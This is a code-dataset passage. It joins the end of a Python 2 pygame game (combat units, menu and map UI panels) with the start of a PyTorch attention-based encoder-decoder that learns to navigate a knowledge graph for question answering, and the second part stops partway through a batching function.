self.npcs=[FightUnit('1',x=20,y=30,speed=4.4),
FightUnit('2',x=20,y=30,speed=3.4),
FightUnit('3',x=20,y=30,speed=2.4),
]
self.enviroment=[]
def step(self):
for npc in self.npcs:
npc.step()
class FightUnit(object):
neighbour = [(-1,0),
(-1,1),
(0,1),
(1,1),
(1,0),
(1,-1),
(0,-1),
(-1,-1)]
def __init__(self, name, **args):
self.name = name
self.speed = 1
self.x = 0.0
self.y = 0.0
self.program = self.program_go_to(1500,1500)
self.active_target = None
self.last_enemy = None
for k,v in args.items():
setattr(self,k,v)
def __repr__(self):
return '\n'.join(["%s: %s" % (k,v)
for k,v in self.__dict__.items()])
def step(self):
self.program.next()
def program_stay(self,ticks):
while True:
for i in range (1,ticks):
yield None
self.program = self.program_walking()
def program_walking(self):
while True:
dx,dy = random.choice(self.neighbour)
s = random.randrange(100)
for i in range (1,s):
self.x += dx*self.speed
self.y += dy*self.speed
yield None
if not 0<self.x<600:
self.program = self.program_go_to(1300,1300)
if not 0<self.y<600:
self.program = self.program_go_to(1300,1300)
def program_go_to(self,x,y):
while True:
dy = div_by_zero(y - self.y,abs(y - self.y))
dx = div_by_zero(x - self.x,abs(x - self.x))
if abs(y - self.y)<2 and abs(x - self.x)<1:
self.program = self.program_stay(300)
self.x += dx*self.speed
self.y += dy*self.speed
yield None
def order_to_go(self,dx,dy):
self.x+=dx*self.speed
self.y+=dy*self.speed
def get_stats(self):
pass
def get_pos(self):
return (self.x,self.y)
def attack(self):
print self.name, ': arrgh!!!'
if self.active_target is not None:
self.active_target.be_attacked(self,Damage())
else:
print 'i have no target'
self.fight.remove_fighter(self)
def be_attacked(self,enemy,damage):
self.hp -= damage.power * (100 - self.armor)/100
self.last_enemy = enemy
print self.name,': i got %i %s damage' % (damage.power,
damage.type),'my hp = ',self.hp
if self.hp <=0:
self.fight.remove_fighter(self)
print self.name, 'is dead'
def select_active_target(self):
if self.last_enemy in self.fight.fighters:
self.active_target = self.last_enemy
else:
self.active_target = None
def set_active_target(self, target):
self.active_target = target
def begin_fight(self, target):
self.set_active_target(target)
target.set_active_target(self)
return Fight([self,target])
class Damage(object):
def __init__(self):
self.type = 'physical'
self.power = 30
class Fight(object):
def __init__(self, fighters):
self.fighters = fighters
self._iterator = 0
for fighter in fighters:
fighter.fight = self
def __repr__(self):
return 'In fight:' + ' '.join(
[fighter.name for fighter in self.fighters])
def step(self):
self.fighters[self._iterator].attack()
self._iterator += 1
self._iterator = self._iterator % len(self.fighters)
def add_fighter(self,fighter):
self.fighters.append(fighter)
fighter.fight = self
def remove_fighter(self,fighter):
"""Remove fighter from fighters list"""
i = self.fighters.index(fighter)
if i <= self._iterator:
self._iterator -= 1
del self.fighters[i]
fighter.fight = None
fighter.last_enemy = None
for fighter in self.fighters:
fighter.select_active_target()
def is_active(self):
if len(self.fighters) > 1:
return True
else:
return False
--- FILE SEPARATOR ---
import pygame
import graphic
from map import Map
from model import Game
from graphic import Camera
from graphic import ImageStorage
class UiController(object):
def __init__(self):
self.map_drawer = MapDrawer()
self.game_field = UiGameField(self)
self.game_panel = UiGamePanel(self)
self.mini_map = UiMiniMap(self)
self.inventory_panel = UiInventory(self)
self.map_panel = UiMap(self)
self.main_menu = UiMainMenu(self)
self.exit_menu = UiExitMenu(self)
self.exit_without_save = UiExitWithoutSave(self)
self.pause_menu = UiPauseMenu(self)
self.options_menu = UiOptionsMenu(self)
self.load_menu = UiLoadMenu(self)
self.save_menu = UiSaveMenu(self)
self.visible_panels = []
def do_action(self,event):
for panel in self.visible_panels:
action_accepted = panel.offer_action(event)
if action_accepted:
break
def hide_all_panels(self):
copy = self.visible_panels[:]
for panel in copy:
panel.set_unvisible()
def go_to_main_menu(self):
self.hide_all_panels()
self.main_menu.set_visible()
def go_to_play(self):
self.hide_all_panels()
Game().paused = False
self.game_field.set_visible()
self.mini_map.set_visible()
self.game_panel.set_visible()
def pause(self):
self.pause_menu.set_visible()
Game().paused = True
def quick_save(self):
pass
def open_save_menu(self):
pass
def open_load_menu(self):
pass
def open_options_menu(self):
pass
def load_game(self):
pass
def ask_about_exit(self):
self.exit_menu.set_visible()
def ask_about_exit_without_save(self):
self.exit_without_save.set_visible()
def exit(self):
pygame.event.post(pygame.event.Event(pygame.QUIT))
def generate_new_map(self):
self.map_drawer.map_generate()
self.mini_map.prepare_image()
self.map_panel.prepare_image()
self.game_field.prepare_image()
self.move_mini_map_to_player()
def open_inventory(self):
self.inventory_panel.set_visible()
def open_map(self):
self.map_panel.set_visible()
def map_move(self,(x,y)):
map_width = self.map_drawer.get_map_width()
map_height = self.map_drawer.get_map_height()
c = self.mini_map.width/self.mini_map.zoom
self.mini_map.start_x = max(x - c / 2,0)
self.mini_map.start_y = max(y - c / 2,0)
self.mini_map.start_x = min(x - c / 2,map_width - c)
self.mini_map.start_y = min(y - c / 2,map_height - c)
self.mini_map.update_image()
def player_keyboard_move(self,direction):
player = Game().player
if direction == 'up':
player.order_to_go(0,-1)
if direction == 'down':
player.order_to_go(0,1)
if direction == 'left':
player.order_to_go(-1,0)
if direction == 'right':
player.order_to_go(1,0)
Camera().update(player.get_pos())
self.move_mini_map_to_player()
def player_mouse_move(self,x,y):
player = Game().player
px,py = Camera().coord_transform(player.get_pos())
dx = x - px
dy = y - py
norm = max(abs(dx),abs(dy))
dx /= norm
dy /= norm
player.order_to_go(dx,dy)
Camera().update(player.get_pos())
self.move_mini_map_to_player()
def move_mini_map_to_player(self):
player_x,player_y = Game().player.get_pos()
tile_size = self.game_field.tile_size
self.map_move((player_x/tile_size,player_y/tile_size))
class Event(object):
def __init__(self):
self.clear()
def __repr__(self):
return '\n'.join(["%s: %s" % (k,v)
for k,v in self.__dict__.items()])
def clear(self):
self.event_type = 'empty'
self.direction = ''
self.key = None
self.x = 0
self.y = 0
self.dx = 0
self.dy = 0
def get_pygame_event(self,event):
self.clear()
if event.type == pygame.KEYUP:
self.event_type = 'key press'
self.key = event.key
if event.type == pygame.USEREVENT:
self.event_type = event.code
if event.code == 'keyboard direct':
self.direction = event.direct
if event.code == 'mouse direct':
self.x,self.y = event.pos
if event.type == pygame.MOUSEBUTTONUP:
self.x,self.y = event.pos
if event.button==1:
self.event_type = 'left click'
if event.button==3:
self.event_type = 'right click'
if event.type == pygame.MOUSEMOTION:
self.x,self.y = event.pos
#self.dx,self.dy = event.rel
if event.buttons[0] == 1:
self.event_type = 'drag'
if event.buttons == (0,0,0):
self.event_type = 'mouse move'
class UiPanel(object):
def __init__(self,controller,
color=(255,0,0),
depth=0,visible=False,
top=0,left=0,
width=100,height=100,):
self.controller = controller
self.visible = visible
self.top = top
self.left = left
self.width = width
self.height = height
self.depth = depth
self.color = color
self.data = None
self.image = None
def __repr__(self):
return '%s' % self.__class__
def offer_action(self,action):
return False
def draw(self):
if self.image is None:
self.prepare_image()
else:
self.update_image()
return self.image
def prepare_image(self):
self.image = pygame.Surface((self.width, self.height))
self.image.fill(self.color)
font20 = pygame.font.Font(None, 20)
if hasattr(self,'data'):
for button in self.data:
button.image1 = pygame.Surface((button.width,
button.height))
button.image1.fill(button.color)
button.image2 = pygame.Surface((button.width,
button.height))
if not button.static:
r,g,b = button.color
color=(int(r*0.7),int(g*0.8),int(b*0.9))
button.image2.fill(color)
if button.mode in ('image','text and image'):
image = ImageStorage()[button.image_sourse][0][0]
button.image1.blit(image,(0,0))
button.image2.blit(image,(0,0))
x,_ = image.get_size()
else:
x = 0
if button.mode in ('text','text and image'):
textImg = font20.render(button.caption, 1, (0,0,0))
button.image1.blit(textImg,(x+5,0));
button.image2.blit(textImg,(x+5,0));
self.image.blit(button.image1,(button.left,button.top))
def update_image(self):
if hasattr(self,'data'):
for button in self.data:
self.image.blit(button.get_image(),(button.left,button.top))
def set_visible(self):
if self.visible:
pass
else:
self.visible = True
self.controller.visible_panels.append(self)
self.controller.visible_panels.sort(key=lambda x: -x.depth)
def set_unvisible(self):
if self.visible:
self.visible = False
self.controller.visible_panels.remove(self)
class UiButton(object):
def __init__(self,name,
mode,#text,image,text and image
top=0,left=0,
width=100,height=100,
image_sourse = '',
static = False,
color=(200,60,0)
):
self.name = name
self.caption = name
self.mode = mode
self.top = top
self.left = left
self.width = width
self.height = height
self.static = static
self.color = color
self.image_sourse = image_sourse
self.image1 = None
self.image2 = None
self.state='main'
def get_image(self):
if self.state == 'main':
return self.image1
elif self.state == 'mouseover':
return self.image2
def is_mouse_over(self,x,y):
ret = False
if x in range(self.left,self.left+self.width):
if y in range(self.top,self.top+self.height):
ret = True
return ret
class uiTable(object):
pass
class UiGameField(UiPanel):
def __init__(self,controller):
self.tile_size=40
self.controller = controller
self.visible = False
self.top = 0
self.left = 0
self.width = 600
self.height = 600
self.depth = 0
self.color = (100,50,50)
self.image = None
self.data1 = {}
self.data = []
def prepare_image(self):
self.image = pygame.Surface((self.width, self.height))
self.a = pygame.sprite.Group(graphic.Character_Sprite('actor2'),
graphic.Character_Sprite('actor1'),
graphic.Character_Sprite('actor3'),
#graphic.Character_Sprite('evil'),
)
i=0
for sprite in self.a:
sprite.data = Game().npcs[i]
i +=1
playersprite = graphic.Character_Sprite('evil')
playersprite.data = Game().player
self.a.add(playersprite)
Camera().update(Game().player.get_pos())
map_drawer = self.controller.map_drawer
self.bg = map_drawer.get_all_map_image(self.tile_size)
self.image.blit(self.bg,(-Camera().dx,-Camera().dy))
self.data1 = map_drawer.prepare_map_objects(self.tile_size)
'''test=ImageStorage()['plants']
for i in range(len(test)):
testrow=test[i]
for j in range(len(testrow)):
testimg = testrow[j]
self.bg.blit(testimg,(i*40,j*40))'''
self.a.draw(self.image)
def update_image(self):
if not Game().paused:
if Game().counter % Game().animate_divider == 0:
animate = True
else:
animate = False
self.image.fill((0,0,0))#for clearing sprites
self.a.clear(self.image,self.image)
self.a.update(animate)
self.image.blit(self.bg,(-Camera().dx,-Camera().dy)) #pos bg
#objects
self.data=[]
player_x,player_y = Game().player.get_pos()
for y in range((player_y-self.height/2)/self.tile_size,
(player_y+self.height/2)/self.tile_size):
for x in range((player_x-self.width/2)/self.tile_size,
(player_x+self.width/2)/self.tile_size):
if (x,y) in self.data1:
btn = self.data1[x,y]
self.data.append(btn)
img=btn.get_image()
self.image.blit(img,(x*self.tile_size-Camera().dx,y*self.tile_size-Camera().dy))
self.a.draw(self.image)
def offer_action(self,event):
ret = False
if event.event_type == 'keyboard direct':
self.controller.player_keyboard_move(event.direction)
ret = True
if event.event_type == 'mouse direct':
self.controller.player_mouse_move(event.x,event.y)
ret = True
if event.event_type == 'mouse move':
for button in self.data:
button.state = 'main'
if button.is_mouse_over(event.x+Camera().dx,
event.y+Camera().dy):
button.state = 'mouseover'
ret = True
return ret
class UiGamePanel(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 565
self.left = 5
self.width = 400
self.height = 30
self.depth = 1
self.color = (200,0,100)
self.image = None
self.data = [UiButton('inventory','image',5,5,100,25,'icon-backpack'),
UiButton('craft','text and image',5,115,100,25,'icon-craft'),
UiButton('exit','text',5,220,100,25),
]
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27,19):
self.controller.pause()
ret = True
if event.key in (105,):
self.controller.open_inventory()
ret = True
if event.key in (109,):
self.controller.open_map()
ret = True
if event.event_type == 'mouse move':
for button in self.data:
button.state = 'main'
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
button.state = 'mouseover'
ret = True
return ret
class UiMap(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 85
self.left = 42
self.width = 513
self.height = 513
self.depth = 9
self.color = (60,150,40)
self.image = None
self.zoom = 4
self.data = None
self.start_x=0
self.start_y=0
def prepare_image(self):
self.image = pygame.Surface((self.width, self.height))
map_drawer = self.controller.map_drawer
self.all_map_image = map_drawer.get_all_map_image(self.zoom)
self.image.blit(self.all_map_image,(0,0))
def update_image(self):
tile_size = self.controller.game_field.tile_size
self.image.fill((0,0,0))
player_x,player_y = Game().player.get_pos()
pixel = pygame.Surface((self.zoom, self.zoom))
pixel.fill((255,0,0))
self.image.blit(self.all_map_image,(-self.start_x*self.zoom,
-self.start_y*self.zoom))
self.image.blit(pixel,
((player_x/tile_size-self.start_x)*self.zoom,
(player_y/tile_size-self.start_y)*self.zoom))
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27,109):
self.set_unvisible()
ret = True
if event.event_type == 'left click':
x = event.x-self.left
y = event.y-self.top
if x in range (0,self.width) and y in range (0,self.height):
self.controller.map_move((x/self.zoom,y/self.zoom))
ret = True
if event.event_type == 'mouse direct':
ret = True
return ret
class UiMiniMap(UiMap):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 5
self.left = 451
self.width = 129
self.height = 129
self.depth = 1
self.color = (200,0,100)
self.data = None
self.image = None
self.zoom = 8
self.start_x = 0
self.start_y = 0
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (32,):
self.controller.generate_new_map()
ret = True
return ret
class MapDrawer(object):
def __init__(self):
self.__data=Map()
def map_generate(self):
self.__data.generate()
def get_map_width(self):
return self.__data.width
def get_map_height(self):
return self.__data.height
def get_tile(self,size,value):
waterline = self.__data.waterline
if value <= waterline:
color = (25, 25, value+75)
elif value > waterline and value <= waterline + 10:
color = (value+80, value+80, 100)
elif value > waterline + 10 and value <= waterline + 40:
color = (0, 255-value, 0)
elif value > waterline + 40 and value <= 190:
color = (0, 255-value, 0)
elif value > 190:
color = (255-value, 255-value, 255-value)
tile = pygame.Surface((size, size))
tile.fill(color)
return tile
def get_all_map_image(self,tile_size):
waterline = self.__data.waterline
map_width = self.__data.width
map_height= self.__data.height
map_data = self.__data.map
all_map_image = pygame.Surface((tile_size * map_width,
tile_size * map_height))
for y in range(0, map_height):
for x in range(0, map_width):
value = int(map_data[y][x])
tile = self.get_tile(tile_size,value)
all_map_image.blit(tile,(x*tile_size,y*tile_size))
return all_map_image
def get_all_map_from_storage(self,tile_size):
waterline = self.__data.waterline
map_width = self.__data.width
map_height = self.__data.height
map_data = self.__data.storage[self.data.name]
all_map_image = pygame.Surface((tile_size * map_width,
tile_size * map_height))
for y in range(0, map_height):
for x in range(0, map_width):
if not isinstance(map_data[y][x],list):
value = int(map_data[y][x])
tile = self.get_tile(tile_size,value)
all_map_image.blit(tile,(x*tile_size,y*tile_size))
else:
square = map_data[y][x]
for i in range(0,len(square)):
for j in range(0,len(square)):
value = int(square[i][j])
tile = self.get_tile(tile_size/len(square),value)
all_map_image.blit(tile,(x*tile_size+j*tile_size/len(square),y*tile_size+i*tile_size/len(square)))
return all_map_image
def prepare_map_objects(self,tile_size):
objsd = {}
#objsl = []
for key,value in self.__data.objects_on_map.items():
x,y = key
button = UiButton(name=value,
mode='image',
top=y*tile_size,left=x*tile_size,
width=30,height=30,
image_sourse ='flower',
static=False,
color=(200,60,0))
img_x=value/100
img_y=value%100
button.image1 = ImageStorage()['plants'][img_x][img_y]
button.image2 = ImageStorage()['plants_2'][img_x][img_y]
objsd[(x,y)]=button
#objsl.append(button)
#return (objsd,objsl)
return objsd
class UiInventory(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 300
self.left = 300
self.width = 280
self.height = 100
self.depth = 2
self.color = (200,100,0)
#self.data = None
self.image = None
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27,105):
self.set_unvisible()
ret = True
return ret
class UiMainMenu(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 0
self.left = 0
self.width = 600
self.height = 600
self.depth = 0
self.color = (100,100,0)
self.image = None
self.data = [UiButton('continue','text',100,250,100,25),
UiButton('new','text',140,250,100,25),
UiButton('load','text',180,250,100,25),
UiButton('options','text',220,250,100,25),
UiButton('exit','text',260,250,100,25),
]
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (32,13,112):
self.controller.go_to_play()
ret = True
if event.key == 27:
self.controller.ask_about_exit()
ret = True
if event.event_type == 'mouse move':
for button in self.data:
button.state = 'main'
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
button.state = 'mouseover'
ret = True
if event.event_type == 'left click':
for button in self.data:
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
if button.name == 'continue':
self.controller.go_to_play()
ret = True
if button.name == 'new':
self.controller.go_to_play()
ret = True
if button.name == 'load':
self.controller.open_load_menu()
ret = True
if button.name == 'options':
self.controller.open_options_menu()
ret = True
if button.name == 'exit':
self.controller.ask_about_exit()
ret = True
return ret
class UiLoadMenu(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 100
self.left = 150
self.width = 300
self.height = 400
self.depth = 15
self.color = (100,0,40)
self.image = None
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27):
self.set_unvisible()
ret = True
return ret
class UiSaveMenu(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 100
self.left = 150
self.width = 300
self.height = 400
self.depth = 15
self.color = (60,50,40)
self.image = None
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27):
self.set_unvisible()
ret = True
return ret
class UiOptionsMenu(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 100
self.left = 150
self.width = 300
self.height = 400
self.depth = 15
self.color = (50,0,140)
self.image = None
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27):
self.set_unvisible()
ret = True
return ret
class UiPauseMenu(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 100
self.left = 150
self.width = 300
self.height = 400
self.depth = 10
self.color = (10,70,40)
self.image = None
self.data = [UiButton('continue','text',100,100,100,25),
UiButton('save','text',140,100,100,25),
UiButton('load','text',180,100,100,25),
UiButton('options','text',220,100,100,25),
UiButton('main menu','text',260,100,100,25),
]
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27,19):
self.controller.go_to_play()
ret = True
if event.event_type == 'mouse direct':
ret = True
if event.event_type == 'mouse move':
for button in self.data:
button.state = 'main'
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
button.state = 'mouseover'
ret = True
if event.event_type == 'left click':
for button in self.data:
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
if button.name == 'continue':
self.controller.go_to_play()
ret = True
if button.name == 'save':
self.controller.open_save_menu()
ret = True
if button.name == 'load':
self.controller.open_load_menu()
ret = True
if button.name == 'options':
self.controller.open_options_menu()
ret = True
if button.name == 'main menu':
self.controller.ask_about_exit_without_save()
ret = True
return ret
class UiExitMenu(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 200
self.left = 250
self.width = 100
self.height = 50
self.depth = 20
self.color = (0,0,40)
self.image = None
self.data = [UiButton('yes','text',20,20,25,25),
UiButton('no','text',20,65,25,25),
]
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (121,):
self.controller.exit()
ret = True
if event.key in (27,110):
self.set_unvisible()
ret = True
if event.event_type == 'mouse move':
for button in self.data:
button.state = 'main'
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
button.state = 'mouseover'
ret = True
if event.event_type == 'left click':
for button in self.data:
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
if button.name == 'yes':
self.controller.exit()
ret = True
if button.name == 'no':
self.set_unvisible()
ret = True
return ret
class UiExitWithoutSave(UiPanel):
def __init__(self,controller):
self.controller = controller
self.visible = False
self.top = 200
self.left = 250
self.width = 100
self.height = 50
self.depth = 20
self.color = (0,20,20)
self.image = None
self.data = [UiButton('yes','text',20,20,25,25),
UiButton('no','text',20,65,25,25),
]
def offer_action(self,event):
ret = False
if event.event_type == 'key press':
if event.key in (27):
self.set_unvisible()
ret = True
if event.event_type == 'mouse move':
for button in self.data:
button.state = 'main'
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
button.state = 'mouseover'
ret = True
if event.event_type == 'left click':
for button in self.data:
if button.is_mouse_over(event.x-self.left,
event.y-self.top):
if button.name == 'yes':
self.controller.go_to_main_menu()
ret = True
if button.name == 'no':
self.set_unvisible()
ret = True
return ret
|
[
"/functions.py",
"/graphic.py",
"/main.py",
"/map.py",
"/model.py",
"/ui.py"
] |
000Justin000/agnav
|
import os
import sys
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import math, copy, time
import pandas as pd
from transformers import AutoTokenizer
import matplotlib.pyplot as plt
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from utils import *
from IPython.core.debugger import set_trace
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
# we will use CUDA if it is available
USE_CUDA = torch.cuda.is_available()
DEVICE = torch.device('cuda:0') if USE_CUDA else torch.device("cpu")
# set random seed
seed = 666
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
class EncoderDecoder(nn.Module):
"""
A standard Encoder-Decoder architecture. Base for this and many
other models.
"""
def __init__(self, encoder, decoder, src_embed, trg_embed, evaluator):
super(EncoderDecoder, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.src_embed = src_embed
self.trg_embed = trg_embed
self.evaluator = evaluator
def forward(self, src, trg, src_mask, trg_mask, src_lengths, trg_lengths):
"""Take in and process masked src and target sequences."""
encoder_hidden, encoder_final = self.encode(src, src_mask, src_lengths)
return self.decode(encoder_hidden, encoder_final, src_mask, trg, trg_mask)
def encode(self, src, src_mask, src_lengths):
return self.encoder(self.src_embed(src), src_mask, src_lengths)
def decode(self, encoder_hidden, encoder_final, src_mask, trg, trg_mask, decoder_hidden=None):
return self.decoder(self.trg_embed(trg), encoder_hidden, encoder_final, src_mask, trg_mask, hidden=decoder_hidden)
class Encoder(nn.Module):
"""Encodes a sequence of word embeddings"""
def __init__(self, input_size, hidden_size, num_layers=1, dropout=0.0):
super(Encoder, self).__init__()
self.num_layers = num_layers
self.rnn = nn.GRU(input_size, hidden_size, num_layers, batch_first=True, bidirectional=True, dropout=dropout)
def forward(self, x, mask, lengths):
"""
Applies a bidirectional GRU to sequence of embeddings x.
The input mini-batch x needs to be sorted by length.
x should have dimensions [batch, time, dim].
"""
packed = pack_padded_sequence(x, lengths, batch_first=True)
output, final = self.rnn(packed)
output, _ = pad_packed_sequence(output, batch_first=True)
# we need to manually concatenate the final states for both directions
fwd_final = final[0:final.size(0):2]
bwd_final = final[1:final.size(0):2]
final = torch.cat([fwd_final, bwd_final], dim=2) # [num_layers, batch, 2*dim]
return output, final
class Decoder(nn.Module):
"""A conditional RNN decoder with attention."""
def __init__(self, emb_size, hidden_size, attention, num_layers=1, dropout=0.0, bridge=True):
super(Decoder, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.attention = attention
self.dropout = dropout
self.rnn = nn.GRU(emb_size+2*hidden_size, hidden_size, num_layers, batch_first=True, dropout=dropout)
# to initialize from the final encoder state
self.bridge = nn.Linear(2*hidden_size, hidden_size, bias=True) if bridge else None
self.dropout_layer = nn.Dropout(p=dropout)
self.pre_output_layer = nn.Linear(hidden_size + 2*hidden_size + emb_size, hidden_size, bias=False)
def forward_step(self, prev_embed, encoder_hidden, src_mask, proj_key, hidden):
"""Perform a single decoder step (1 word)"""
# compute context vector using attention mechanism
query = hidden[-1].unsqueeze(1) # [#layers, B, D] -> [B, 1, D]
context, attn_probs = self.attention(query=query, proj_key=proj_key, value=encoder_hidden, mask=src_mask)
# update rnn hidden state
rnn_input = torch.cat([prev_embed, context], dim=2)
output, hidden = self.rnn(rnn_input, hidden)
pre_output = torch.cat([prev_embed, output, context], dim=2)
pre_output = self.dropout_layer(pre_output)
pre_output = self.pre_output_layer(pre_output)
return output, hidden, pre_output, attn_probs
def forward(self, trg_embed, encoder_hidden, encoder_final, src_mask, trg_mask, hidden=None, max_len=None):
"""Unroll the decoder one step at a time."""
# the maximum number of steps to unroll the RNN
if max_len is None:
max_len = trg_mask.size(-1)
# initialize decoder hidden state
if hidden is None:
hidden = self.init_hidden(encoder_final)
# pre-compute projected encoder hidden states
# (the "keys" for the attention mechanism)
# this is only done for efficiency
proj_key = self.attention.key_layer(encoder_hidden)
# here we store all intermediate hidden states and pre-output vectors
decoder_states = []
pre_output_vectors = []
attn_probs_history = []
# unroll the decoder RNN for max_len steps
for i in range(max_len):
prev_embed = trg_embed[:, i].unsqueeze(1)
output, hidden, pre_output, attn_probs = self.forward_step(prev_embed, encoder_hidden, src_mask, proj_key, hidden)
decoder_states.append(output)
pre_output_vectors.append(pre_output)
attn_probs_history.append(attn_probs)
decoder_states = torch.cat(decoder_states, dim=1)
pre_output_vectors = torch.cat(pre_output_vectors, dim=1)
return decoder_states, hidden, pre_output_vectors, attn_probs_history # [B, N, D]
def init_hidden(self, encoder_final):
"""Returns the initial decoder state,
conditioned on the final encoder state."""
if encoder_final is None:
return None # start with zeros
return torch.tanh(self.bridge(encoder_final))
class BahdanauAttention(nn.Module):
"""Implements Bahdanau (MLP) attention"""
def __init__(self, hidden_size, key_size=None, query_size=None):
super(BahdanauAttention, self).__init__()
# We assume a bi-directional encoder so key_size is 2*hidden_size
key_size = 2*hidden_size if key_size is None else key_size
query_size = hidden_size if query_size is None else query_size
self.key_layer = nn.Linear(key_size, hidden_size, bias=False)
self.query_layer = nn.Linear(query_size, hidden_size, bias=False)
self.energy_layer = nn.Linear(hidden_size, 1, bias=False)
# to store attention scores
self.alphas = None
def forward(self, query=None, proj_key=None, value=None, mask=None):
assert mask is not None, "mask is required"
# We first project the query (the decoder state).
# The projected keys (the encoder states) were already pre-computated.
query = self.query_layer(query)
# Calculate scores.
scores = self.energy_layer(torch.tanh(query + proj_key))
scores = scores.squeeze(2).unsqueeze(1)
# Mask out invalid positions.
# The mask marks valid positions so we invert it using `mask & 0`.
scores.data.masked_fill_(mask == 0, -float('inf'))
# Turn scores to probabilities.
alphas = F.softmax(scores, dim=-1)
self.alphas = alphas
# The context vector is the weighted sum of the values.
context = torch.bmm(alphas, value)
# context shape: [B, 1, 2D], alphas shape: [B, 1, M]
return context, alphas
class Evaluator(nn.Module):
"""Define standard linear action value function."""
def __init__(self, hidden_size, vocab_size):
super(Evaluator, self).__init__()
self.proj = nn.Linear(hidden_size, vocab_size, bias=False)
def forward(self, x):
return self.proj(x)
def make_model(src_vocab, tgt_vocab, emb_size=256, hidden_size=512, num_layers=1, dropout=0.0):
"Helper: Construct a model from hyperparameters."
attention = BahdanauAttention(hidden_size)
model = EncoderDecoder(
Encoder(emb_size, hidden_size, num_layers=num_layers, dropout=dropout),
Decoder(emb_size, hidden_size, attention, num_layers=num_layers, dropout=dropout),
nn.Embedding(src_vocab, emb_size),
nn.Embedding(tgt_vocab, emb_size),
Evaluator(hidden_size, tgt_vocab))
return model
class Batch:
"""Object for holding a batch of data with mask during training.
Input is a batch from a torch text iterator.
"""
def __init__(self, src, trg, pad_index=0):
src, src_lengths = src
self.src = src
self.src_lengths = src_lengths
self.src_mask = (src != pad_index).unsqueeze(-2)
self.nseqs = src.size(0)
trg, trg_lengths = trg
self.trg = trg
self.trg_lengths = trg_lengths
self.trg_mask = (self.trg != pad_index)
self.ntokens = self.trg_mask.data.sum().item()
def simulate_episode(G, qa_instance, tokenizer, model, action_to_ix, max_len, epsilon, verbose=False):
question, decorated_entity, answer_set = qa_instance
tokenized_inputs = tokenizer(question, max_length=50, padding=True, truncation=True, return_tensors="pt")
src, src_mask = tokenized_inputs["input_ids"].to(DEVICE), tokenized_inputs["attention_mask"].unsqueeze(-2).to(DEVICE)
assert decorated_entity in G.nodes
kgnode = decorated_entity
if verbose:
print(question)
print(kgnode)
kgnode_chain = []
action_chain = []
reward_chain = []
encoder_hidden, encoder_final = model.encode(src, src_mask, [src_mask.sum().item()])
# pre-compute projected encoder hidden states
# (the "keys" for the attention mechanism)
# this is only done for efficiency
proj_key = model.decoder.attention.key_layer(encoder_hidden)
# initialize decoder hidden state
hidden_init = model.decoder.init_hidden(encoder_final)
sos_embed = model.trg_embed(torch.tensor([action_to_ix["[SOS]"]], device=DEVICE)).unsqueeze(1)
_, hidden, context, _ = model.decoder.forward_step(sos_embed, encoder_hidden, src_mask, proj_key, hidden_init)
for t in range(max_len):
# compute the action value functions for available actions at the current node
actions = unique([info["type"] for (_, _, info) in G.edges(kgnode, data=True)]) + ["terminate"]
values = model.evaluator(context)[0, 0, [action_to_ix[action] for action in actions]]
# select the action at the current time step with epsilon-greedy policy
if random.random() < epsilon:
action = random.choice(actions)
else:
action = actions[values.argmax()]
# take the action
if (action == "terminate") or (t == max_len-1):
reward = torch.tensor(1.0 if ((action == "terminate") and (re.match(r".+: (.+)", kgnode).group(1) in answer_set)) else 0.0).to(DEVICE)
kgnode_next = "termination"
hidden_next = None
context_next = None
else:
reward = torch.tensor(0.0).to(DEVICE)
kgnode_next = random.choice(list(filter(lambda tp: tp[2]["type"] == action, G.edges(kgnode, data=True))))[1]
action_embed = model.trg_embed(torch.tensor([action_to_ix[action]], device=DEVICE)).unsqueeze(1)
_, hidden_next, context_next, _ = model.decoder.forward_step(action_embed, encoder_hidden, src_mask, proj_key, hidden)
kgnode_chain.append(kgnode)
action_chain.append(action)
reward_chain.append(reward)
if verbose:
print(actions)
print(values.data.reshape(-1).to("cpu"))
print(action, " =====> ", kgnode_next)
if kgnode_next == "termination":
break
else:
kgnode = kgnode_next
hidden = hidden_next
context = context_next
return kgnode_chain, action_chain, reward_chain
def make_batch(episodes, tokenizer, action_to_ix, pad_index=0, sos_index=1):
episodes = sorted(episodes, key=lambda x: (-len(tokenizer.tokenize(x.qa_instance.question)), -len(x.action_chain)))
inputs = tokenizer(list(map(lambda x: x.qa_instance.question, episodes)), max_length=50, padding=True, truncation=True, return_tensors="pt", return_length=True)
src = inputs["input_ids"].to(DEVICE)
src_lengths = inputs["length"]
